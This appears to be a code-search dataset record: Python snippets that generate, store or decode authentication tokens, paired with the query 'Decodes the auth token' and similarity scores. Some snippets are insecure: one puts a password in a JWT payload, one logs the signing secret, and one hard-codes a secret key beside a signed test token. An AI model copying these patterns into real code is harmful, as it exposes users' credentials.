dbconnect(CONFIG[CONFIG['app']['dbserver']])\n tcurr = tconn.cursor()\n try:\n results = tcurr.execute(tokenq, params).fetchone()\n except cx_Oracle.DatabaseError as err:\n LOG.error(\"Database error in retrieving tokens: %s\", err)\n\n if tcurr.rowcount > 0:\n oauth_tokens = {\n 'access_token': results[0],\n 'refresh_token': results[1],\n 'expires_at': results[2],\n 'token_type': results[3],\n 'expires_in': results[4],\n 'user': {\n 'name': results[5],\n 'id': user_id\n }\n }\n else:\n LOG.error(\"no token found for \" + str(tool_id) + ', ' + user_id)\n tcurr.close()\n tconn.close()\n return oauth_tokens", "def create_password_reset_token(self, user_id):\n try:\n self.logger.debug('Password Reset attempt %s', user_id)\n password_reset_token = ''\n nosqldb = self.pers.nosql_db\n db_user_record = nosqldb['users'].find_one(\n {\n '$or': [\n {'username': user_id},\n {'email': user_id}\n ]\n }\n )\n # Confirm the user exists from previous query\n if db_user_record:\n # purge any old requests, even if unrelated\n nosqldb['passwordResets'].delete_many(\n {\n 'requestDate': {'$lt': datetime.datetime.utcnow() -\n datetime.timedelta(minutes=5)}\n }\n )\n\n already_sent = nosqldb['passwordResets'].find_one(\n {\n 'email': user_id\n }\n )\n if not already_sent:\n # create a password reset token\n #password_reset_token = hashlib.sha512('abc'.encode('utf-8')).hexdigest()\n password_reset_token = secrets.token_urlsafe(255)\n #persist the password reset request\n nosqldb['passwordResets'].insert_one(\n {\n 'username': db_user_record['username'],\n 'email': db_user_record['email'],\n 'requestDate': datetime.datetime.utcnow(),\n 'resetToken': password_reset_token,\n }\n )\n else:\n self.logger.debug('Password Reset Email Denied: existing request in flight')\n return password_reset_token\n except Exception as exc:\n self.logger.debug('Unexpected Error %s', str(exc))\n raise", "def token_auth(self):\n self.client = APIClient()\n self.user = User.objects.create_user(username='testuser', email='test@test.com', password='testpassword')\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)", "def __retrieve_rt_token(user_id):\n\n slack_user = user_profile(user_id)\n if slack_user['ok']:\n username = slack_user['user']['profile'].get('email', '').split('@')[0]\n user = get_user_model().objects.filter(username=username).first()\n if user:\n prefs = UserPreferences.objects.filter(user=user).first()\n if prefs:\n if prefs.rt_token:\n cipher_suite = Fernet(settings.CRYPTO_KEY)\n return cipher_suite.decrypt(prefs.rt_token.encode('utf-8')).decode('utf-8')\n return None", "def generate_token():\n chars = ('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')\n rand = random.SystemRandom()\n random_string = ''.join(rand.choice(chars) for _ in range(40))\n return hmac.new(\n config.SECRET_KEY,\n random_string,\n hashlib.sha256\n ).hexdigest()", "def for_user(cls, user):\n\n token = super().for_user(user)\n\n TokenMeta.objects.get_or_create(\n jti=token['jti'],\n token=str(token),\n )\n\n return token", "def make_token():\n return secrets.token_urlsafe(36)", "def create_token(self):\n ts_datetime = self.logged_at or self.created_at\n ts = int(mktime(ts_datetime.timetuple()))\n key = base64.encodestring(self.email)\n base = \"{}{}\".format(key, ts)\n salt, hsh = self.password.split('$')\n return \"{}$${}\".format(key, get_hexdigest(salt, base))", "def get(self):\n # Login of authorized user stores in Flask g object\n user = User.query.filter_by(username=g.user.username).first()\n # Generate token\n token = user.generate_auth_token()\n # Send token in ASCII format\n return {'token': token.decode('ascii')}", "def _generate_jwt_token(self):\n payload = jwt_payload_handler(self)\n token = jwt_encode_handler(payload)\n return token", "def login_user(id, password):\n auth = init_auth()\n\n try:\n user = auth.sign_in_with_email_and_password(id,password)\n token = user['localId'] #['idToken']\n #print(\"Success\")\n return token\n except:\n print(\"invalid user or password. Please try again\")", "def get_auth_token(cls):\n return jsonify({\n 'user': current_user.serialize(),\n 'token': current_user.get_auth_token(),\n })", "def generate_token(email):\n access_token = create_access_token(email)\n return access_token", "def token(self):\n payload = {\n 'id': str(self.id),\n 'username': self.username,\n \"exp\": datetime.now() + timedelta(days=2)\n }\n return jwt.encode(payload, SECRET_KEY).decode('utf-8')", "def generate_refresh_token(self):\n return gen_api_key(length=self.token_length)", "def encode_auth_token(user_id: int, user_name:str, user_login:str, perfil_nome:str) -> bytes:\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1, seconds=5),\n 'iat': datetime.datetime.utcnow(),\n 'uid': user_id,\n 'name': user_name,\n 'login': user_login,\n 'perfil': perfil_nome,\n }\n return jwt.encode(\n payload,\n key,\n algorithm='HS256'\n )\n except Exception as e:\n return e", "def login(user: User):\n try:\n time = datetime.datetime.utcnow() + datetime.timedelta(seconds=60)\n payload = {\"user_id\": user.name, \"password\": user.password, \"exp\": time}\n token = jwt.encode(payload, JWT_SECRET_KEY, JWT_ALGORITHM).decode('utf-8')\n return {\"token\": token}\n except Exception:\n return {\"message\": \"Error in creating Token\"}", "def _generate_token(self):\n return sha1(\"%s#%s\" % (time(),\n self.app.cfg['sessions/secret'])).hexdigest()", "def auth_token(self):", "def _create_security_token(user):\n timestamp = int(time.time())\n plaintext = \"%x %s\" % (timestamp, user.email)\n nearest_mult_of_16 = 16 * ((len(plaintext) + 15) // 16)\n # Pad plaintest with whitespace to make the length a multiple of 16,\n # as this is a requirement of AES encryption.\n plaintext = plaintext.rjust(nearest_mult_of_16, ' ')\n if _DISABLE_CRYPTO:\n body = plaintext\n sig = \"sig\"\n else:\n key_storage = KeyStorage.get()\n body = AES.new(key_storage.aes_key, AES.MODE_CBC).encrypt(plaintext)\n hmac_key = key_storage.hmac_key\n if type(hmac_key) == unicode:\n # Crypto requires byte strings\n hmac_key = hmac_key.encode('utf8')\n sig = HMAC.HMAC(key=hmac_key, msg=body).hexdigest()\n return '%s:%s' % (sig, body)", "def create_jwt(user, secret):\n logger.debug(\"Create JWT with secret %s\" % secret)\n # username = request.POST['username']\n # password = request.POST['password'\n\n expiry = datetime.datetime.now() + datetime.timedelta(seconds=30)\n expiry_s = time.mktime(expiry.timetuple())\n if user.is_authenticated():\n internalid = user.authprofile.internalid\n payload = {'username': user.username, 'expiry': expiry_s, 'type': \"AuthenticatedUser\", 'internalid': internalid, 'email': user.email}\n token = jws.sign(payload, secret, algorithm='HS256')\n else:\n payload = {'expiry':expiry_s, 'type': \"AnonymousUser\", 'internalid': None, 'email': None}\n token = jws.sign(payload, secret, algorithm='HS256')\n logger.debug(\"Payload: %s\" % payload)\n # logger.info(\"Token: %s\" % token)\n return token", "def get_user_token(username, expires_at=None):\n issued_at = datetime.utcnow()\n token = AccessToken()\n token.payload.update(\n {\n \"email\": f\"{username}@funmooc.fr\",\n \"exp\": expires_at or issued_at + timedelta(days=2),\n \"iat\": issued_at,\n \"language\": settings.LANGUAGE_CODE,\n \"username\": username,\n }\n )\n return token" ]
[ "0.75365555", "0.7299488", "0.71115804", "0.710188", "0.690935", "0.685729", "0.6822128", "0.6820735", "0.68139696", "0.67837673", "0.67776555", "0.6730933", "0.66888976", "0.6683402", "0.6680387", "0.66462904", "0.66453385", "0.65843165", "0.6561365", "0.6530449", "0.6494656", "0.6485782", "0.64657134", "0.6456405", "0.64296424", "0.6416558", "0.63899386", "0.63889116", "0.6364325", "0.63623685", "0.63617295", "0.6360795", "0.63567245", "0.63421756", "0.6309229", "0.6308884", "0.62934697", "0.6265049", "0.6258337", "0.62008256", "0.6184071", "0.6184071", "0.61553794", "0.6145635", "0.6122362", "0.61186564", "0.6115072", "0.6101673", "0.6097905", "0.6079587", "0.6067275", "0.60359836", "0.603189", "0.6012647", "0.5998637", "0.5981397", "0.595506", "0.5953607", "0.59415144", "0.59293866", "0.5909976", "0.5886134", "0.58749694", "0.5873821", "0.5857879", "0.5824199", "0.5818633", "0.5809484", "0.5803751", "0.5801352", "0.57960504", "0.57913715", "0.57880044", "0.5787756", "0.57585347", "0.5758367", "0.5755521", "0.57516795", "0.5739689", "0.57282627", "0.5719842", "0.57190067", "0.5713964", "0.5710261", "0.5706108", "0.5702149", "0.56882274", "0.56839937", "0.567408", "0.56531644", "0.5651009", "0.56500983", "0.5643937", "0.56320184", "0.56160235", "0.561464", "0.56124467", "0.5596971", "0.5585854", "0.55810916" ]
0.65751797
18
Decodes the auth token
def decodeAuthToken(authToken): try: return jwt.decode(authToken, current_app.config['SECRET_KEY'], algorithm='HS256')['sub'] except jwt.ExpiredSignatureError: return 'signature expired, Please login again' except jwt.InvalidTokenError: return 'Invalid token'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, Config.SECRET_KEY,algorithms='HS256')\n return payload\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode(encoded_token):\n return jwt.decode(encoded_token, key=settings.JWT_AUTH['JWT_SECRET_KEY'])", "def decode_auth_token(auth_token):\n if len(auth_token) != 139:\n return \"Invalid token. Please log in again.\"\n try:\n payload = jwt.decode(auth_token, key)\n is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n if is_blacklisted_token:\n return 'Token blacklisted. Please log in again.'\n else:\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))\n\n # is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n # if is_blacklisted_token:\n # return 'Token blacklisted. Please log in again.'\n # else:\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_token(token):\n\n return jwt.decode(\n token, settings.JWT_SECRET, algorithms=[settings.JWT_ALGO])", "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, Config.SECRET_KEY,algorithms='HS256')\n return payload['role']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_token(token):\n decoded_token = jwt.decode(token, secret_key, algorithms=['HS256'])\n return decoded_token", "def decode_auth_token(auth_token):\n try:\n payload = jwt.decode(auth_token, key)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode(token):\n return jwt.decode(token, app.config[\"JWT_SECRET\"], algorithms=[\"HS256\"])", "def decode_auth_token(auth_token): \n try: \n payload = jwt.decode(auth_token, getattr(settings, \"SECRET_KEY\", \"\"),algorithms=['HS256']) \n is_blacklisted_token = User.check_blacklist(auth_token)\n if is_blacklisted_token:\n return False,'Token blacklisted. Please log in again.'\n else:\n return True, payload['sub']\n except jwt.ExpiredSignatureError:\n return False,'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return False,'Invalid token. Please log in again.'", "def decode_auth_token(auth_token, config):\n secret_key = config['JWT_SECRET_KEY']\n try:\n payload = jwt.decode(auth_token, secret_key)\n return payload['sub']\n except jwt.ExpiredSignatureError as error:\n raise ExpiredToken from error\n except (jwt.InvalidTokenError, jwt.DecodeError) as error:\n raise InvalidToken from error", "def parse_token(token):\n return jwt.decode(token, app.config['JWT_SECRET'])", "def decode_auth_token(secret_key, auth_token):\n try:\n payload = jwt.decode(auth_token, secret_key) \n is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n if is_blacklisted_token:\n return 'Token blacklisted. Please log in again.' \n else: \n return payload['sub']\n except jwt.ExpiredSignatureError:\n return 'Signature expired. Please log in again.'\n except jwt.InvalidTokenError:\n return 'Invalid token. Please log in again.'", "def decode_auth_token(auth_token: str) -> Union[str, int]:\n try:\n payload = jwt.decode(auth_token, key, algorithms='HS256')\n \n user=Usuario.query.filter_by(id=payload['uid']).first()\n is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)\n if is_blacklisted_token:\n return 'Conta deslogada. Por favor realizar o login novamente.'\n elif user.ativo!=True:\n return 'Conta invativa. Por favor entrar em contato com o administrador.'\n else:\n return payload['uid']\n except jwt.ExpiredSignatureError:\n return 'Token expirado. Por favor realizar o login novamente.'\n except jwt.InvalidTokenError:\n return 'Token inválido. Por favor realizar o login novamente.'", "def decode_token(token):\n payload = None\n try:\n payload = jwt.decode(token.encode('utf-8'), '1$Arh\"1bWa/7+OS', algorithm='HS256')['u_id']\n except jwt.InvalidTokenError:\n pass\n return payload", "def decode_token(token):\n try:\n # Decode token with our secret key\n payload = jwt.decode(token, SECRET_KEY)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # token has expired\n return \"Timed out. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def decode_token(token):\n try:\n payload = jwt.decode(\n token, app.config.get('SECRET_KEY'), algorithms='HS256')\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def decodeJWT(self, token):\n try:\n return jwt.decode(token, self.secret, algorithms=[self.algorithm])\n except jwt.exceptions.InvalidSignatureError:\n raise ValueError(f'The following JWT is invalid: {token}')", "def decode(encoded):\n if encoded is None:\n return None\n\n try:\n s = decode(APP.config['SECRET_KEY'], encoded)\n return json.loads(s)\n except Exception as err:\n LOGGER.error('Error decoding auth: %s' % str(err))\n raise err", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, app.config.get('SECRET_KEY'), algorithms=['HS256'])\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\"", "def get_token(self):\n\n try:\n return jwt.decode(self.fetch_token(), KEY, algorithms=['HS256'])\n except jwt.exceptions.DecodeError:\n raise InvalidToken", "def decode_token(token: str):\n try:\n decoded = b64decode(token.encode())\n key_data = orjson.loads(decoded)\n timestamp = int(key_data['t'])\n pub_key = key_data['p']\n signature = key_data['s']\n except (ValueError, TypeError, KeyError, orjson.JSONDecodeError, binascii.Error) as e:\n logging.debug(\"Invalid token format: %s\", token)\n raise HTTPException(status_code=403, detail=\"Invalid token\") from e\n\n if timestamp > time.time() or timestamp < time.time() - TOKEN_EXPIRE_INTERVAL:\n raise HTTPException(status_code=403, detail=\"Token expired\")\n\n try:\n check_signature(\n ''.join([pub_key, str(timestamp)]),\n signature,\n pub_key\n )\n except InvalidSignature as e:\n logging.error(\"Invalid token signature. Might be access violation.\")\n raise HTTPException(status_code=403, detail=\"Invalid token\") from e\n\n return pub_key", "def decode_token_appengine(credentials, token, verify=False):\n return _decode_token(credentials, token, False)", "def decode_token(token, options=JWT_OPTIONS):\n return jwt.decode(\n token,\n SECRET_KEY,\n issuer=JWT_ISSUER,\n audience=JWT_AUDIENCE,\n options=options,\n algorithms=(JWT_OPTIONS_ALGORITHM,)\n )", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, os.environ.get('SECRET', 'test'))\n return \"\", payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\", None\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\", None", "def get_payload(cls, token):\n \n secret = cls.secret\n algo = cls.algo\n decoded = jwt.decode(token, secret, algo)\n return decoded", "def _decode(token):\n if token is None:\n return None\n # Pad the token out to be divisible by 4.\n padded_token = bytes(token, 'utf8') + '='.encode() * (4 - (len(token) % 4))\n decoded_token = base64.urlsafe_b64decode(padded_token)\n token_dict = json.loads(decoded_token)\n if not token_dict or not isinstance(token_dict, dict):\n raise ValueError('Invalid pagination token: {}').format(token_dict)\n return token_dict", "def decode_request(self, data):\n return decode_jwt(data[\"jwt\"], data[\"cert_name\"], self.node.node_name, self.node.id)", "def get_auth(self, as_string: bool=True):\n enc = base64.b64encode('{}:{}'.format(APIAuthentication.token_code, APIAuthentication.api_token).encode())\n if as_string:\n return enc.decode()\n else:\n return enc", "def verify_token(self, token: str) -> str:\n return decode(self.rd.hget(\"auth:by_token\", token))", "def decode_token(self, token: str, max_age: int) -> Optional[object]:\n try:\n return self.serializer.loads(token, max_age)\n except (BadSignature, SignatureExpired) as e:\n return None", "def parse_token(req):\n auth_string_list = req.headers.get('Authorization').split()\n # Check in correct format i.e. Bearer: 39xds03lda0...\n if len(auth_string_list) == 1:\n raise ValueError('Authorization has invalid format')\n else:\n token = auth_string_list[1]\n data = jwt.decode(token, config.SECRET_KEY, algorithms='HS256')\n return data", "def test_decode_token(token):\n payload = User.decode_auth_token(token)\n user = User.find_by_id(payload.get('id'))\n assert isinstance(user, User) is True\n assert user.email == 'adminuser@test.com'", "def _lookup_token(self):\n path = '/authn/{account}/{login}/authenticate'.format(\n account=self.account, login='admin'\n )\n res = self._post(path, data=self.api_token, skip_auth=True)\n return base64.b64encode(res.text)", "def decode(self, crypto):", "def decode_payload(encoded_payload):\n jwt_secret = app.config['SECRET_KEY']\n payload = jwt.decode(encoded_payload, jwt_secret, algorithms='HS256')\n\n return payload", "def auth_token(self):", "def test_decode_token_invalid(token):\n payload = User.decode_auth_token(f'{token}1337')\n assert isinstance(payload, User) is False\n assert 'Invalid token' in payload", "def _verified_token(self,encoded_token: bytes) -> Dict[str,Union[str,int,bool]]:\n try:\n return jwt.decode(encoded_token,self._SECRET_KEY,algorithms=self._ALGORITHM)\n except jwt.ExpiredSignatureError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.DecodeError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidAlgorithmError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidKeyError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidTokenError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidIssuerError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidAudienceError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidIssuedAtError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.InvalidSignatureError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.ImmatureSignatureError as err:\n raise HTTPException(status_code=422,detail=str(err))\n except jwt.MissingRequiredClaimError as err:\n raise HTTPException(status_code=422,detail=str(err))", "def parseAuthResponse(self, code):\n oaDict = {}\n\n # Get tokens\n result = self.fetchToken(code)\n if not result['OK']:\n return result\n self.log.debug('Token RESPONSE:\\n', pprint.pformat(result['Value']))\n oaDict['Tokens'] = result['Value']\n\n # Get user profile\n result = self.getUserProfile(oaDict['Tokens']['access_token'])\n if not result['OK']:\n return result\n oaDict['UserProfile'] = result['Value']\n self.log.debug('User profile RESPONSE:\\n', pprint.pformat(result['Value']))\n\n # Get tokens\n result = self.fetchToken(refreshToken=oaDict['Tokens']['refresh_token'])\n if not result['OK']:\n return result\n oaDict['Tokens'] = result['Value']\n self.log.debug('Token RESPONSE:\\n', pprint.pformat(result['Value']))\n\n return S_OK(oaDict)", "def decode(self, encoded):", "def test_decode_IQ_token(self):\n\n token = \"\"\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1laWQiOiJhZGZzfHNodzAwMXNhaW50ZWxzZXdoZXJlfGpwX2FkbWluQHVybjphdXRoMDpzYWludGVsc2V3aGVyZSIsImVtYWlsIjoiSmFpbWluLlBhdGVsODMrNTE2NDU2QGdtYWlsLmNvbSIsInVuaXF1ZV9uYW1lIjoiSVFHRU5IT1NQXFxiXy1kcHl4eDBFeVVjR0pIaG1aOCIsImh0dHBzOi8vdGVsZXRyYWNraW5nLmNsb3VkYXBwLm5ldC9pZGVudGl0eS9jbGFpbXMvYWR1c2VyZ3VpZCI6IjMveFFhZ0VrSWttcllBU0VQZHVZRmc9PSIsImh0dHBzOi8vdGVsZXRyYWNraW5nLmNsb3VkYXBwLm5ldC9pZGVudGl0eS9jbGFpbXMvZmlyc3RuYW1lIjoiQWRtaW4iLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL2xhc3RuYW1lIjoiVGVzdCIsImh0dHBzOi8vdGVsZXRyYWNraW5nLmNsb3VkYXBwLm5ldC9pZGVudGl0eS9jbGFpbXMvb3VuYW1lIjoiU2FpbnRFbHNld2hlcmUiLCJyb2xlIjpbIkRvbWFpbiBVc2VycyIsIkFkbWluaXN0cmF0b3IiLCJJUUdlbkhvc3BTZWMiLCJTYWludEVsc2V3aGVyZSJdLCJ1cG4iOiJKYWltaW4uUGF0ZWw4Mys1MTY0NTZAZ21haWwuY29tIiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL2lkZW50aXRpZXMvZGVmYXVsdC9wcm92aWRlciI6ImFkZnMiLCJodHRwOi8vc2NoZW1hcy5hdXRoMC5jb20vaWRlbnRpdGllcy9kZWZhdWx0L2Nvbm5lY3Rpb24iOiJzaHcwMDFzYWludGVsc2V3aGVyZSIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9pZGVudGl0aWVzL2RlZmF1bHQvaXNTb2NpYWwiOiJmYWxzZSIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9naXZlbl9uYW1lIjoiSVFHRU5IT1NQXFxiXy1kcHl4eDBFeVVjR0pIaG1aOCIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9waWN0dXJlIjoiaHR0cHM6Ly9zLmdyYXZhdGFyLmNvbS9hdmF0YXIvMzUxYTRiMjU4NWViM2UyYjA1NWI4ZTAyOGY4NzdmNDc_cz00ODBcdTAwMjZyPXBnXHUwMDI2ZD1odHRwcyUzQSUyRiUyRmNkbi5hdXRoMC5jb20lMkZhdmF0YXJzJTJGaXEucG5nIiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL25pY2tuYW1lIjoiSmFpbWluLlBhdGVsODMrNTE2NDU2IiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL2VtYWlsX3ZlcmlmaWVkIjoidHJ1ZSIsImh0dHA6Ly9zY2hlbWFzLmF1dGgwLmNvbS9jbGllbnRJRCI6Imtrakgxd3AzdE53RmpEN0M1djI3a0oyWHFWUHE1akhtIiwiaHR0cDovL3NjaGVtYXMuYXV0aDAuY29tL3VwZGF0ZWRfYXQiOiJNb24gSmFuIDE0IDIwMTkgMTU6NTY6MTIgR01UKzAwMDAgKFVUQykiLCJodHRwOi8vc2NoZW1hcy5hdXRoMC5jb20vY3JlYXRlZF9hdCI6IkZyaSBKYW4gMTEgMjAxOSAyMDoxNToyMiBHTVQrMDAwMCAoVVRDKSIsImF1dGhtZXRob2QiOiJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvYXV0aGVudGljYXRpb25tZXRob2QvcGFzc3dvcmQiLCJhdXRoX3RpbWUiOiIyMDE5LTAxLTE0VDIzOjU2OjEyLjg1M1oiLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL3RlbmFudGlkIjoiMjExNmU5NDMtNTA5NC00MWY3LTgzMTgtODNhYWMyYWMxMTQ3IiwiaHR0cHM6Ly90ZWxldHJhY2tpbmcuY2xvdWRhcHAubmV0L2lkZW50aXR5L2NsYWltcy9jb250ZXh0cGVyc29uaWQiOiIwYTAxMjBhMS04NTU3LTQ4MzEtYTQyNi1hOGJkMDBmNjFkYzkiLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL3VzZXJuYW1lZm9ybWFsIjoiVGVzdCwgQWRtaW4iLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL3VzZXJuYW1laW5mb3JtYWwiOiJBZG1pbiBUZXN0IiwiaHR0cHM6Ly90ZWxldHJhY2tpbmcuY2xvdWRhcHAubmV0L2lkZW50aXR5L2NsYWltcy91c2VySWQiOiI0ZmU5OTdmZC00ZGNkLTQxNWItYjJjYi1hOGJkMDBmNjFkYzkiLCJodHRwczovL3RlbGV0cmFja2luZy5jbG91ZGFwcC5uZXQvaWRlbnRpdHkvY2xhaW1zL2ZlYXR1cmV0eXBlaWQiOlsiNCIsIjIiLCIxIiwiMyIsIjUiLCI2Il0sImlzcyI6InRlbGV0cmFja2luZy5jb20iLCJhdWQiOiJodHRwOi8vd3d3LnNlcnZpY2UudGVsZXRyYWNraW5nLmNvbS8iLCJleHAiOjE1NTAwNzM0MzksIm5iZiI6MTU0NzQ4MTQzOX0.UCL-Wc3OSVDI58U5ShOYqLa-DwNc_WQ3BlY5P3CfnVI\"\"\"\n audience = 'http://www.service.teletracking.com/'\n\n secret = 'drMemxWrLen6fCXQA5jO6gXkK/UoZVzPGRDiff7ByPU='\n decoded_token = AuthenticationHandler.validate_and_decode_token(\n token=token, key=secret,\n audience=audience\n )\n self.assertTrue(decoded_token['role'][0] == 'Domain Users', \"Group 1 not match\")\n self.assertTrue(decoded_token['role'][1] == 'Administrator', \"Group 2 not match\")", "def parse_jwt_guest_token(self, raw_token: str) -> Dict[str, Any]:\n secret = current_app.config[\"GUEST_TOKEN_JWT_SECRET\"]\n algo = current_app.config[\"GUEST_TOKEN_JWT_ALGO\"]\n audience = self._get_guest_token_jwt_audience()\n return self.pyjwt_for_guest_token.decode(\n raw_token, secret, algorithms=[algo], audience=audience\n )", "def test_decode_token():\n pass", "async def decode(self, jwt_token: str, verify=True) -> dict:\n try:\n jwt_token = jwt_token.replace(f\"{self.auth_schema} \", \"\")\n payload = jwt.decode(\n jwt_token,\n self.jwt_secret,\n algorithms=(self.jwt_algorithm,),\n options={\"verify_exp\": verify},\n )\n\n return payload\n\n except jwt.DecodeError:\n raise InvalidTokenException()\n\n except jwt.ExpiredSignatureError:\n raise TokenExpiredException()", "def get_auth_token(self):\n data = [str(self.id), self.password]\n return login_serializer.dumps(data)", "async def validate_token(self, token: bytes, audience=None) -> Dict[str, str]:\n\n try:\n header = jwt.get_unverified_header(token)\n if \"kid\" not in header:\n raise InvalidToken(\"Missing kid in header\")\n return jwt.decode(token, await self.retrieve_public_key(self._decode_public_key_identifier(header[\"kid\"])), algorithms='RS256', issuer=tedious.config.CONFIG[\"TOKEN\"][\"issuer\"], audience=audience)\n except DecodeError:\n raise InvalidToken(\"Unable to decode token.\")\n except Exception as e:\n raise InvalidToken(str(type(e)) + \" \" + str(e))", "def deserialize_cred(context_obj, encoded_cred):\n\treturn serialize_or_deserialize_cred(context_obj,encoded_cred,DESERIALIZE)", "def get_token(self):\n message = {\n \"request\": \"access_token\",\n \"account\": self.account,\n \"min_valid_period\": self.validity,\n \"application_hint\": \"orpy\",\n }\n try:\n self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self._sock.connect(self.socket_path)\n self._sock.sendall(json.dumps(message).encode())\n\n data = \"\"\n while True:\n recv = self._sock.recv(16).decode()\n if recv:\n data += recv\n else:\n break\n except socket.error as err:\n raise exceptions.AuthExceptiob(\n err=\"Cannot communicate with the \" \"oidc-agent: %s\" % err\n )\n finally:\n self._sock.close()\n\n token = json.loads(data)\n if token.get(\"status\") == \"failure\":\n raise exceptions.AuthError(err=token.get(\"error\"))\n return token", "def get_token(alias, reg_code, privKey):\n data = json.dumps({\n \"namespace\": alias,\n \"reg_code\": reg_code\n })\n url = endpoint('auth')\n r = requests.post(url,data=data) \n token_str = (r.__dict__['_content']).decode()\n r_token_obj = json.loads(token_str)\n token_cipher = ast.literal_eval( r_token_obj[\"token\"] )\n token_obj = dict()\n token_obj = {\n \"authToken\": decrypt_message( privKey, token_cipher),\n \"expiration_minutes\": r_token_obj[\"expiration_minutes\"],\n \"expiration\": str(datetime.datetime.now() + datetime.timedelta(minutes=r_token_obj[\"expiration_minutes\"]))\n }\n expiration = token_obj[\"expiration\"]\n expiration = parser.parse(expiration)\n if datetime.datetime.now() > expiration:\n print(\"Token has expired\")\n else:\n c = expiration - datetime.datetime.now()\n valid_minutes = str(divmod(c.total_seconds(), 60)[0])\n return token_obj[\"authToken\"]", "def get_auth_token():\n token = g.user.generate_auth_token(24*3600)\n return jsonify({'user_id': g.user.id, 'token': token.decode('ascii')})", "def get_jwt():\n\n try:\n scheme, token = request.headers['Authorization'].split()\n assert scheme.lower() == 'basic'\n return base64.b64decode(token).decode(\"UTF-8\")\n except (KeyError, ValueError, AssertionError):\n raise Forbidden('Invalid Bearer Token.')", "def _upgrade_token(self, http_body):\n self.token_string = auth_sub_string_from_body(http_body)", "def extract(self, data):\n return ujson.loads(self.cipher.decrypt(data))", "def get_token(self):\n response = self.client.post(\n url_for('auth.login'),\n data=json.dumps({'username': 'thundoss@gmail.com', 'password': 'denno'}),\n headers={'content_type': 'application/json'})\n return json.loads(response.data)['token']", "def validate_token(self, data):\n try:\n payload = jwt.decode(data, settings.SECRET_KEY, algorithm=['HS256'])\n except jwt.ExpiredSignatureError:\n raise serializers.ValidationError('Verification link has expired')\n except jwt.exceptions.PyJWTError:\n raise serializers.ValidationError('Invalidad token')\n if payload['type'] != 'email_confirmation':\n raise serializers.ValidationError('Invalid token')\n self.context['payload'] = payload\n return data", "def decode_jwt(encoded, key, algorithms = 'HS256'):\n try:\n payload = jwt.decode(\n encoded, \n key, \n algorithms = algorithms\n )\n\n return payload\n # if token has expired:\n except jwt.exceptions.ExpiredSignatureError:\n raise JWTError(\n {\n 'code': 'token_expired',\n 'description': 'Token expired.'\n }, \n 401\n )\n # other 